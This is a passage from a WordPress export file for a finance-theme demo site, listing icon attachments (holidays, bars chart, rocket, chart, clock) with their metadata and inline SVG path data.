3.358-7.5 7.5s3.358 7.5 7.5 7.5z"></path><path d="m355.409 445.743h49.7c4.143 0 7.5-3.358 7.5-7.5s-3.357-7.5-7.5-7.5h-49.7c-4.143 0-7.5 3.358-7.5 7.5s3.358 7.5 7.5 7.5z"></path></g></svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>holidays</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/elements__trashed/holidays/</link>
		<pubDate>Wed, 09 Sep 2020 07:33:25 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/holidays.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>643</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 07:33:25]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 07:33:25]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[holidays]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/holidays.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/holidays.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 512 512"><g><path d="m456.907 161.731-36.977-14.932c-5.967-2.408-12.25-3.628-18.678-3.628-.03 0-.06 0-.09 0l-24.136.04-20.518-19.911c5.611-3.677 9.33-10.01 9.33-17.204 0-11.34-9.227-20.567-20.567-20.567h-26.483c-.377 0-.745.037-1.107.091l-83.802-81.325c-2.83-2.748-6.562-4.263-10.51-4.267l-42.989-.028c-.002 0-.004 0-.005 0-3.635 0-7.013 1.96-8.815 5.118-1.804 3.158-1.774 7.065.075 10.194l75.651 128.099-41.77.065c-1.196.001-2.404.092-3.59.27-.059.009-.118.018-.177.029l-70.077 12.26-49.75-37.177c-2.049-1.533-4.583-2.376-7.139-2.376-.008 0-.016 0-.023 0l-24.191.042c-3.835.008-7.347 2.111-9.164 5.488s-1.637 7.465.468 10.667l34.021 51.798-33.842 51.918c-2.094 3.213-2.258 7.302-.427 10.673 1.827 3.363 5.337 5.45 9.161 5.45h.021l24.19-.042c2.566-.005 5.106-.857 7.149-2.397l49.624-37.352 70.119 12.016c.061.011.123.02.185.029 1.18.171 2.397.244 3.577.257l41.861-.065-37.682 63.807c-6.849-3.421-10.843-6.886-12.607-8.651-1.956-1.955-3.795-4.086-5.467-6.335-3.195-4.301-8.101-6.773-13.46-6.787-.015 0-.028 0-.042 0-5.355 0-10.271 2.457-13.49 6.745-1.672 2.226-3.536 4.371-5.544 6.377-6.604 6.605-22.881 17.722-57.691 17.975l-11.326.082c-6.876.05-12.471 5.685-12.471 12.562v40.948c0 4.109 3.33 7.439 7.439 7.439s7.439-3.33 7.439-7.439v-38.647l9.027-.066c40.116-.292 59.888-14.117 68.103-22.331 2.501-2.501 4.829-5.181 6.922-7.967.521-.694 1.22-.8 1.593-.8h.005c.445.002 1.075.139 1.556.786 2.104 2.828 4.421 5.513 6.886 7.979 6.615 6.614 26.491 22.031 68.105 22.333l9.027.066v73.838c0 14.933-3.471 29.913-10.038 43.322s-16.273 25.336-28.07 34.493l-37.26 28.918c-2.961 2.297-6.503 3.511-10.245 3.511s-7.284-1.214-10.243-3.51l-37.261-28.919c-11.796-9.156-21.503-21.083-28.07-34.493-6.566-13.409-10.038-28.389-10.038-43.322 0-4.109-3.33-7.439-7.439-7.439s-7.439 3.33-7.439 7.439c0 17.188 3.995 34.432 11.554 49.866 7.559 15.435 18.731 29.163 32.308 39.702l37.262 28.919c5.513 4.278 12.39 6.635 19.364 6.635s13.852-2.357 19.366-6.636l37.261-28.918c13.578-10.538 24.749-24.267 32.308-39.702s11.554-32.678 11.554-49.866v-76.137c0-6.877-5.595-12.511-12.471-12.562l-11.326-.082c-12.598-.091-22.805-1.715-30.964-3.98l40.855-69.179 91.634-.143-61.47 59.654c-2.947 2.861-3.018 7.57-.157 10.519 1.459 1.502 3.398 2.258 5.339 2.258 1.866 0 3.735-.698 5.18-2.101l10.856-10.535h29.081c11.34 0 20.567-9.226 20.567-20.566 0-7.553-4.105-14.151-10.19-17.727l22.191-21.535 23.463-.037c6.462-.012 12.773-1.254 18.756-3.695l36.925-15.059c9.181-3.745 14.875-12.23 14.857-22.145-.011-9.916-5.734-18.383-14.927-22.095zm-111.636 96.602c3.137 0 5.69 2.552 5.69 5.69 0 3.136-2.552 5.689-5.69 5.689h-13.751l11.724-11.378h2.027zm0-157.927c3.137 0 5.69 2.552 5.69 5.69 0 3.137-2.552 5.69-5.69 5.69h-.629l-11.726-11.379h12.355zm106.094 91.789-36.925 15.059c-4.2 1.712-8.628 2.585-13.163 2.593l-195.645.306c-.003 0-.007 0-.01 0-.442 0-.886-.03-1.325-.09l-73.178-12.541c-2.016-.346-4.092.156-5.73 1.389l-51.403 38.691-14.976.025 32.007-49.102c1.615-2.477 1.609-5.675-.015-8.146l-32.177-48.991 14.975-.025 51.538 38.513c1.643 1.226 3.719 1.72 5.734 1.369l73.138-12.796c.438-.062.882-.093 1.325-.094l113.263-.177c4.109-.007 7.434-3.342 7.427-7.45-.007-4.105-3.336-7.427-7.439-7.427-.004 0-.008 0-.012 0l-54.228.085-75.886-128.503 34.698.022c.06 0 .116.022.159.064l132.182 128.277-1.783.003c-4.108.007-7.433 3.343-7.426 7.451.007 4.104 3.336 7.426 7.439 7.426h.013l47.247-.078h.063c4.512 0 8.923.857 13.109 2.546l36.976 14.931c5.212 2.105 5.625 6.904 5.628 8.325 0 1.421-.396 6.222-5.6 8.345z"></path><path d="m234.902 173.999c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.004-5.325-4.324-9.639-9.649-9.635z"></path><path d="m270.583 173.976c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.004-5.324-4.323-9.638-9.649-9.635z"></path><path d="m305.624 173.954c-5.325.003-9.639 4.323-9.636 9.648s4.323 9.639 9.648 9.635c5.325-.003 9.639-4.323 9.635-9.648-.003-5.325-4.322-9.639-9.647-9.635z"></path><path d="m341.305 173.931c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.005-5.324-4.324-9.638-9.649-9.635z"></path><path d="m150.203 316.284c-10.855 3.962-22.954 6.715-35.961 8.183-5.408.611-9.486 5.179-9.486 10.628v51.148c0 27.281 12.36 52.522 33.911 69.248l32.996 25.608c1.932 1.501 4.247 2.251 6.562 2.251s4.629-.75 6.559-2.249l32.997-25.61c21.551-16.726 33.912-41.965 33.912-69.248v-51.148c0-5.45-4.08-10.02-9.487-10.628-13.006-1.467-25.105-4.221-35.96-8.183-7.22-2.635-13.734-5.768-19.359-9.314-5.262-3.318-12.062-3.317-17.324-.001-5.627 3.546-12.14 6.681-19.36 9.315zm28.749 3.271c6.519 4.109 13.986 7.71 22.193 10.706 10.908 3.98 22.892 6.847 35.67 8.534v47.448c0 22.652-10.262 43.608-28.157 57.495l-30.435 23.621-30.435-23.621c-17.894-13.888-28.156-34.843-28.156-57.495v-47.448c12.779-1.687 24.761-4.553 35.67-8.534 8.209-2.996 15.676-6.598 22.193-10.706.449-.283 1.008-.283 1.457 0z"></path><path d="m145.068 374.175c-3.261 2.498-3.88 7.167-1.382 10.429l23.844 31.134c1.397 1.823 3.557 2.899 5.854 2.915h.051c2.278 0 4.431-1.044 5.843-2.835l43-54.567c2.543-3.226 1.989-7.904-1.239-10.446-3.224-2.543-7.904-1.988-10.446 1.239l-37.073 47.046-18.023-23.533c-2.497-3.26-7.164-3.879-10.429-1.382z"></path></g></svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bars-chart</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/elements__trashed/bars-chart/</link>
		<pubDate>Wed, 09 Sep 2020 07:44:39 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bars-chart.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>648</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 07:44:39]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 07:44:39]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bars-chart]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bars-chart.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bars-chart.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M488.399,492h-21.933V173.536c0-14.823-12.06-26.882-26.882-26.882H390.56c-14.823,0-26.882,12.06-26.882,26.882V492    h-55.692V317.825c0-14.823-12.059-26.882-26.882-26.882H232.08c-14.823,0-26.882,12.06-26.882,26.882V492h-55.692v-90.204    c0-14.823-12.06-26.882-26.882-26.882H73.599c-14.823,0-26.882,12.06-26.882,26.882V492H23.601c-5.523,0-10,4.477-10,10    s4.477,10,10,10h464.798c5.523,0,10-4.477,10-10S493.922,492,488.399,492z M129.504,492H66.716v-90.204    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z M287.985,492h-62.788V317.825    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.794,0,6.882,3.087,6.882,6.882V492z M446.466,492h-62.788V173.536    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M466.442,10.516c0.14-2.729-0.82-5.504-2.904-7.588c-2.084-2.084-4.859-3.045-7.588-2.904    C455.789,0.017,455.63,0,455.466,0h-60.5c-5.523,0-10,4.477-10,10s4.477,10,10,10h37.357l-98.857,98.858l-37.28-37.28    c-1.875-1.875-4.419-2.929-7.071-2.929c-2.652,0-5.196,1.054-7.071,2.929l-179.769,179.77c-3.905,3.905-3.905,10.237,0,14.143    c1.953,1.951,4.512,2.927,7.071,2.927s5.119-0.976,7.071-2.929L289.115,102.79l37.28,37.28c3.905,3.905,10.237,3.905,14.143,0    L446.466,34.143v33.81c0,5.523,4.477,10,10,10s10-4.477,10-10V11C466.466,10.837,466.449,10.678,466.442,10.516z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="75.64" cy="303.31" r="10"></circle>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>rocket</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/elements__trashed/rocket/</link>
		<pubDate>Wed, 09 Sep 2020 07:46:16 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/rocket.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>649</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 07:46:16]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 07:46:16]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[rocket]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/rocket.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/rocket.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<circle cx="10.06" cy="500.446" r="10.06"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="267.005" cy="245.308" r="10.04"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M398.479,118.032c-8.071-8.072-18.802-12.516-30.216-12.516c-11.414,0-22.146,4.446-30.216,12.516    c-16.661,16.662-16.661,43.772,0,60.433c8.332,8.331,19.272,12.495,30.216,12.495c10.941,0,21.886-4.166,30.216-12.495    C415.14,161.803,415.14,134.693,398.479,118.032z M384.282,164.266c-8.833,8.832-23.206,8.832-32.037,0    c-8.833-8.832-8.833-23.204,0-32.037c4.279-4.279,9.967-6.635,16.018-6.635c6.051,0,11.739,2.356,16.018,6.635    C393.114,141.062,393.114,155.434,384.282,164.266z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M125.409,411.45c-4.964-2.472-10.99-0.451-13.462,4.512l-11.958,24.015c-5.2,10.441-15.658,17.423-27.296,18.219    l-13.908,0.952c-2.351,0.157-3.897-1.014-4.612-1.729s-1.889-2.264-1.729-4.613l0.952-13.907    c0.797-11.637,7.779-22.096,18.219-27.296l24.014-11.958c4.964-2.472,6.984-8.499,4.512-13.462    c-2.471-4.963-8.498-6.984-13.462-4.512l-24.014,11.958c-16.792,8.362-28.02,25.182-29.302,43.898l-0.952,13.907    c-0.514,7.507,2.242,14.863,7.562,20.183c4.898,4.898,11.523,7.624,18.403,7.624c0.591,0,1.186-0.02,1.78-0.061l13.908-0.952    c18.716-1.281,35.536-12.508,43.898-29.302l11.958-24.014C132.392,419.948,130.372,413.922,125.409,411.45z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M505.07,8.18c-4.711-4.641-11.201-7.068-17.793-6.639l-9.348,0.596c-83.819,5.351-162.262,45.81-215.215,111.004    L240.71,140.23l-57.583-1.691c-0.098-0.003-0.197-0.004-0.294-0.004c-45.668,0-88.603,17.784-120.896,50.076L2.959,247.59    c-2.805,2.805-3.696,7-2.272,10.702c1.424,3.703,4.894,6.221,8.856,6.423l124.844,6.414l-5.09,6.267    c-2.565,3.159-2.971,7.553-1.026,11.127c1.956,3.596,4.006,7.135,6.144,10.617l-29.606,35.147    c-2.531,3.005-3.076,7.211-1.397,10.763c6.467,13.665,15.05,25.943,25.514,36.493c10.718,10.808,23.251,19.646,37.249,26.271    c1.368,0.648,2.835,0.965,4.293,0.965c2.261,0,4.503-0.764,6.327-2.243c6.378-5.174,13.731-11.311,20.843-17.245    c5.069-4.23,10.255-8.557,15.102-12.547c2.893,1.741,5.822,3.429,8.795,5.046c1.504,0.818,3.153,1.221,4.796,1.221    c2.186,0,4.358-0.712,6.156-2.108l6.843-5.31l6.442,125.37c0.204,3.962,2.721,7.432,6.423,8.856c1.172,0.45,2.39,0.67,3.6,0.67    c2.615,0,5.183-1.023,7.101-2.942l58.979-58.979c32.293-32.293,50.076-75.227,50.076-120.896v-54.995l23.267-18.055    c69.729-54.11,112.196-135.704,116.512-223.862l0.239-4.886C512.295,19.27,509.779,12.822,505.07,8.18z M33.123,245.822    l43.012-43.012c28.465-28.465,66.303-44.157,106.553-44.196l42.085,1.236l-74.71,91.98L33.123,245.822z M184.774,373.874    c-5.241,4.372-10.614,8.856-15.6,12.957c-9.644-5.223-18.368-11.74-25.992-19.428c-7.384-7.445-13.669-15.922-18.737-25.26    l21.676-25.733c6.554,8.793,13.728,17.122,21.478,24.925c0.006,0.006,0.012,0.011,0.018,0.017    c0.002,0.002,0.004,0.005,0.006,0.007c0.003,0.003,0.006,0.005,0.009,0.008c8.593,8.648,17.836,16.584,27.641,23.761    C191.811,368.002,188.264,370.962,184.774,373.874z M351.875,327.672c0,40.305-15.695,78.197-44.196,106.698l-43.012,43.012    l-6.002-116.792l93.209-72.33V327.672z M491.678,29.779c-4.029,82.297-43.673,158.467-108.767,208.98l-157.46,122.189    c-13.058-7.63-25.229-16.639-36.368-26.846l53.086-53.086c3.92-3.92,3.92-10.278,0-14.199c-3.921-3.921-10.278-3.921-14.199,0    l-53.036,53.036c-9.751-10.795-18.387-22.541-25.74-35.104L278.3,125.8C327.732,64.941,400.96,27.171,479.207,22.177l9.348-0.596    c1.225-0.076,2.045,0.532,2.423,0.904c0.377,0.371,1,1.178,0.94,2.409L491.678,29.779z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>chart</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/elements__trashed/chart/</link>
		<pubDate>Wed, 09 Sep 2020 08:11:59 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/chart.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>653</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 08:11:59]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 08:11:59]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[chart]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/chart.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/chart.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M436.275,39.807H304.797C300.155,17.119,280.039,0,256,0s-44.156,17.119-48.798,39.807H75.725    c-14.771,0-26.789,12.018-26.789,26.789V351.16c0,14.771,12.017,26.789,26.789,26.789H200.63l-40.566,120.866    c-1.757,5.235,1.063,10.904,6.299,12.662c1.055,0.354,2.128,0.522,3.183,0.522c4.179,0,8.076-2.641,9.479-6.821l42.702-127.229    h68.546l42.702,127.229c1.403,4.181,5.3,6.821,9.479,6.821c1.055,0,2.128-0.169,3.183-0.522c5.236-1.758,8.056-7.427,6.299-12.662    l-40.566-120.866h124.905c14.771,0,26.789-12.018,26.789-26.789V66.596C463.063,51.824,451.046,39.807,436.275,39.807z M256,20    c12.93,0,23.963,8.274,28.082,19.807h-56.163C232.038,28.274,243.071,20,256,20z M443.063,351.16c0,3.743-3.045,6.789-6.789,6.789    h-26.121v-142.56c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10V357.95H359.39V245.979c0-5.522-4.477-10-10-10    c-5.523,0-10,4.478-10,10v111.97h-28.084v-79.255c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v79.255h-25.308V253.277    c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v104.672h-29.037v-55.023c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v55.023    h-23.221v-50.985c0-5.522-4.477-10-10-10s-10,4.478-10,10v50.985h-26.777v-39.337c0-5.522-4.477-10-10-10s-10,4.478-10,10v39.337    h-31.24c-3.743,0-6.789-3.046-6.789-6.789V66.596c0-3.743,3.045-6.789,6.789-6.789h140.468h79.614h140.468    c3.743,0,6.789,3.046,6.789,6.789V351.16z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M410.105,106.884c-0.013-0.137-0.039-0.269-0.058-0.404c-0.026-0.188-0.049-0.377-0.086-0.564    c-0.031-0.158-0.075-0.312-0.114-0.467c-0.04-0.161-0.076-0.323-0.124-0.482c-0.046-0.153-0.104-0.301-0.158-0.451    c-0.056-0.158-0.109-0.317-0.173-0.473c-0.058-0.139-0.125-0.272-0.189-0.407c-0.075-0.161-0.147-0.323-0.231-0.48    c-0.068-0.127-0.146-0.249-0.22-0.373c-0.093-0.156-0.181-0.314-0.283-0.466c-0.089-0.134-0.19-0.259-0.285-0.388    c-0.098-0.133-0.191-0.268-0.297-0.397c-0.179-0.218-0.37-0.425-0.567-0.627c-0.033-0.033-0.06-0.07-0.093-0.103    c-0.032-0.032-0.068-0.059-0.1-0.09c-0.203-0.198-0.412-0.39-0.631-0.57c-0.122-0.1-0.25-0.188-0.376-0.281    c-0.136-0.102-0.269-0.207-0.41-0.302c-0.144-0.096-0.293-0.179-0.44-0.267c-0.133-0.08-0.264-0.163-0.401-0.237    c-0.146-0.078-0.296-0.144-0.445-0.214c-0.147-0.07-0.292-0.143-0.444-0.206c-0.141-0.058-0.285-0.105-0.427-0.156    c-0.166-0.06-0.329-0.123-0.499-0.174c-0.139-0.042-0.279-0.072-0.419-0.108c-0.176-0.045-0.35-0.094-0.53-0.129    c-0.156-0.031-0.314-0.049-0.471-0.072c-0.166-0.025-0.329-0.055-0.497-0.072c-0.267-0.026-0.535-0.036-0.804-0.041    c-0.06-0.001-0.118-0.009-0.178-0.009h-43.197c-5.523,0-10,4.478-10,10s4.477,10,10,10h19.054l-83.028,83.028l-21.797-21.798    c-1.875-1.875-4.419-2.929-7.071-2.929s-5.196,1.054-7.071,2.929l-72.161,72.162l-21.543-21.543    c-3.905-3.904-10.237-3.904-14.142,0l-36.492,36.492c-3.905,3.905-3.905,10.237,0,14.143c1.953,1.952,4.512,2.929,7.071,2.929    c2.559,0,5.119-0.977,7.071-2.929l29.42-29.421l21.543,21.542c3.905,3.904,10.237,3.904,14.142,0l72.161-72.161l21.797,21.798    c1.875,1.875,4.419,2.929,7.071,2.929s5.196-1.054,7.071-2.929l90.099-90.099v19.054c0,5.522,4.477,10,10,10    c5.523,0,10-4.478,10-10v-43.191C410.155,107.546,410.138,107.214,410.105,106.884z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="107.869" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="148.639" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="189.409" r="10"></circle>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>clock</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/elements__trashed/clock/</link>
		<pubDate>Wed, 09 Sep 2020 08:23:22 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/clock.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>659</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 08:23:22]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 08:23:22]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[clock]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/clock.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/clock.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M473.492,189.736h-0.001l-22.417-2.651c-2.44-6.903-5.255-13.693-8.412-20.293l13.979-17.731    c13.686-17.358,13.649-40.806-0.084-54.541l-39.083-39.083c-13.734-13.734-37.182-13.771-54.543-0.083l-17.73,13.981    c-6.603-3.159-13.393-5.974-20.294-8.412l-2.651-22.417C319.659,16.554,303.054,0,283.63,0h-55.271    c-19.424,0-36.03,16.555-38.626,38.51l-2.65,22.417c-6.899,2.439-13.684,5.251-20.284,8.408l-17.73-13.981    c-17.359-13.687-40.807-13.653-54.543,0.083L55.444,94.519c-13.734,13.735-13.771,37.183-0.084,54.541l13.979,17.73    c-3.159,6.602-5.974,13.392-8.413,20.293l-22.418,2.651C16.555,192.33,0,208.935,0,228.359v55.271    c0,19.423,16.554,36.029,38.506,38.624l22.417,2.652c2.438,6.902,5.253,13.692,8.411,20.294l-13.981,17.731    c-13.688,17.359-13.652,40.807,0.083,54.542l39.082,39.083c13.733,13.733,37.182,13.771,54.541,0.084l17.73-13.979    c6.603,3.159,13.393,5.974,20.294,8.413l2.65,22.417C192.329,495.445,208.934,512,228.359,512h55.271    c19.424,0,36.029-16.554,38.626-38.507l2.651-22.416c6.906-2.44,13.698-5.255,20.304-8.416l17.73,13.98    c17.359,13.684,40.807,13.65,54.541-0.085l39.082-39.082c13.734-13.734,13.771-37.182,0.083-54.542l-13.981-17.731    c3.158-6.602,5.973-13.392,8.411-20.294l22.416-2.652C495.445,319.658,512,303.053,512,283.63v-55.271    C512,208.935,495.445,192.33,473.492,189.736z M492,283.63c0,9.291-8.966,17.357-20.854,18.763l-28.704,3.396    c-3.897,0.461-7.165,3.16-8.354,6.9c-3.183,10.008-7.246,19.808-12.073,29.128c-1.807,3.487-1.406,7.709,1.026,10.792    l17.904,22.706c7.413,9.403,8.049,21.448,1.479,28.017l-39.082,39.083c-6.57,6.569-18.614,5.934-28.016-1.479l-22.706-17.903    c-3.083-2.431-7.303-2.833-10.792-1.026c-9.325,4.831-19.128,8.895-29.136,12.078c-3.74,1.189-6.439,4.457-6.9,8.355    l-3.396,28.705c-1.407,11.89-9.474,20.856-18.765,20.856H228.36c-9.292,0-17.359-8.967-18.765-20.857l-3.394-28.706    c-0.461-3.897-3.159-7.166-6.899-8.355c-10.006-3.183-19.806-7.246-29.129-12.076c-1.451-0.752-3.029-1.121-4.598-1.121    c-2.204,0-4.392,0.727-6.193,2.149l-22.706,17.902c-9.403,7.414-21.448,8.047-28.016,1.479l-39.082-39.083    c-6.571-6.57-5.935-18.614,1.479-28.016l17.904-22.707c2.431-3.084,2.833-7.306,1.026-10.792    c-4.827-9.319-8.889-19.12-12.073-29.128c-1.189-3.74-4.457-6.439-8.354-6.9l-28.705-3.396C28.966,300.987,20,292.921,20,283.63    v-55.271c0-9.291,8.967-17.358,20.857-18.764l28.706-3.394c3.898-0.461,7.166-3.159,8.355-6.899    c3.183-10.006,7.246-19.807,12.075-29.129c1.807-3.486,1.406-7.708-1.026-10.791l-17.902-22.706    c-7.414-9.402-8.049-21.446-1.479-28.016l39.081-39.083c6.569-6.57,18.615-5.935,28.017,1.48l22.706,17.904    c3.083,2.431,7.304,2.834,10.791,1.027c9.318-4.827,19.115-8.888,29.12-12.071c3.74-1.189,6.438-4.457,6.899-8.355l3.394-28.705    